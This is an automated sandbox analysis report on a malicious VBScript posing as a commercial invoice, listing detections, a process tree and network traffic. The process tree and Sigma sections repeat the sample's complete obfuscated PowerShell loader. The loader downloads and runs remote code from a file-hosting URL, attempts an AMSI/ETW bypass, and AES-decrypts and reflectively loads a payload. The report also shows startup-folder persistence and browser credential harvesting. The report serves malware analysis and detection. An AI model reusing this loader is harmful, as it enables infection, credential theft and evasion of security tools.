Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Commercial Invoice Confirmation-1132346.vbs

Overview

General Information

Sample name:Commercial Invoice Confirmation-1132346.vbs
Analysis ID:1617742
MD5:f268af24198f756977b03b521f23e96c
SHA1:b5ae78ce8541943b14f48c5003d0c2e306bfae96
SHA256:ac3080be59227ea4650f78500acb8b8de9d2e51089b5d39475ba9b368731b8a6
Tags:vbsuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Sample has a suspicious name (potential lure to open the executable)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7840 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7924 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7984 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 8036 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 8044 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • powershell.exe (PID: 8180 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 6064 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5296 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 1976 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 1984 cmdline: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • powershell.exe (PID: 2512 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Sigma detected: Base64 Encoded PowerShell Command Detected
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJT
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJT
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs", CommandLine|base64offset|contains: "{, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs", ProcessId: 7840, ProcessName: wscript.exe
Sigma detected: Gzip Archive Decode Via PowerShell
Source: Process startedAuthor: Hieu Tran: Data: Command: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJTkdSQU5ET01VU1RSSU5HUkFORE9Nc1NUUklOR1JBTkRPTWVTVFJJTkdSQU5ET01CU1RSSU5HUkFORE9NYVNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NY1NUUklOR1JBTkRPTVBTVFJJTkdSQU5ET01hU1RSSU5HUkFORE9NclNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET01pU1RSSU5HUkFORE9NblNUUklOR1JBTkRPTWdTVFJJTkdSQU5ET00gIlNUUklOR1JBTkRPTWhTVFJJTkdSQU5ET010dHBzU1RSSU5HUkFORE9NOlNUUklOR1JBTkRPTS9TVFJJTkdSQU5ET00vU1RSSU5HUkFORE9NMFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET00wU1RSSU5HUkFORE9NLlNUUklOR1JBTkRPTXNTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NL1NUUklOR1JBTkRPTThTVFJJTkdSQU5ET01aU1RSSU5HUkFORE9NRFNUUklOR1JBTkRPTWFTVFJJTkdSQU5ET00uU1RSSU5HUkFORE9NdFNUUklOR1JBTkRPTXhTVFJJTkdSQU5ET010U1RSSU5HUkFORE9NIikuQ29udGVudC5SZXBsYWNlKCdBQkMnLCcnKSkgLUVycm9yQWN0aW9uIFNpbGVudGx5Q29udGludWU7')))) -replace 'STRINGRANDOM', '');try{iex ((iex (('Invoke-SystemAmsiBypass -DisableETW;').Replace('TTTTT',''))).Content) -ErrorAction Stop}catch{"This system has a modified AMSI"};function SJDOX($param_var){$aes_var=[System.Security.Cryptography.Aes]::Create();$aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aes_var.Key=[System.Convert]::FromBase64String('WrTop3Dy2uR/7q23aw8qRRYFs5pR6KKW0qPOi2nk/SM=');$aes_var.IV=[System.Convert]::FromBase64String('X0OAAhUhQtx3irmnKHjIpQ==');$CPBHM=$aes_var.CreateDecryptor();$DWTPO=$CPBHM.TransformFinalBlock($param_var,0,$param_var.Length);$CPBHM.Dispose();$aes_var.Dispose();$DWTPO;}function decompress_function($param_var){$MLDOJ=New-Object System.IO.MemoryStream(,$param_var);$ILPTT=New-Object System.IO.MemoryStream;$ATXCE=New-Object System.IO.Compression.GZipStream($MLDOJ,[IO.Compression.CompressionMode]::Decompress);$ATXCE.CopyTo($ILPTT);$ATXCE.Dispose();$MLDOJ.Dispose();$ILPTT.Dispose();$ILPTT.ToArray();}$line_var=[System.IO.File]::($POIJOGD[0])([Console]::Title);$payload2_var=decompress_function (SJDOX ([Convert]::FromBase64String([System.Linq.Enumerable]::($POIJOGD[1])($line_var, 6).Substring(2))));[System.Reflection.Assembly]::Load([byte[]]$payload2_var).EntryPoint.Invoke($null,$null); ", CommandLine: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat';$POIJOGD='ReadLEKOXCULineEKOXCULsEKOXCUL'.Replace('EKOXCUL', ''),'ETZYUBRBleTZYUBRBmenTZYUBRBtTZYUBRBAtTZYUBRB'.Replace('TZYUBRB', '');powershell -w hidden;iex (($([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('U1RSSU5HUkFORE9NaVNUUklOR1JBTkRPTWVTVFJJTkdSQU5ET014ICgoaVNUUklOR1JBTkRPTXdTVFJJTkdSQU5ET01yU1RSSU5HUkFORE9NIC1TVFJJT
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs", CommandLine|base64offset|contains: "{, Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Commercial Invoice Confirmation-1132346.vbs", ProcessId: 7840, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, CommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\3h6QL1gQ.bat" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7984, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8044, ProcessName: powershell.exe

Data Obfuscation

barindex
Sigma detected: Drops script at startup location
Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8044, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_75adaf3d.cmd

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:24:35.435140+010028032742Potentially Bad Traffic192.168.2.849706132.226.247.7380TCP
2025-02-18T08:24:51.638349+010028032742Potentially Bad Traffic192.168.2.849711132.226.247.7380TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-02-18T08:24:33.715621+010018100002Potentially Bad Traffic192.168.2.849705168.119.145.117443TCP
2025-02-18T08:24:49.980780+010018100002Potentially Bad Traffic192.168.2.849710168.119.145.117443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: Commercial Invoice Confirmation-1132346.vbsVirustotal: Detection: 13%Perma Link
Joe Sandbox ML detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability

Location Tracking

barindex
Tries to detect the country of the analysis system (by using the IP)
Source: unknownDNS query: name: reallyfreegeoip.org
Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.8:49705 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 168.119.145.117:443 -> 192.168.2.8:49710 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49712 version: TLS 1.2
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior

Software Vulnerabilities

barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
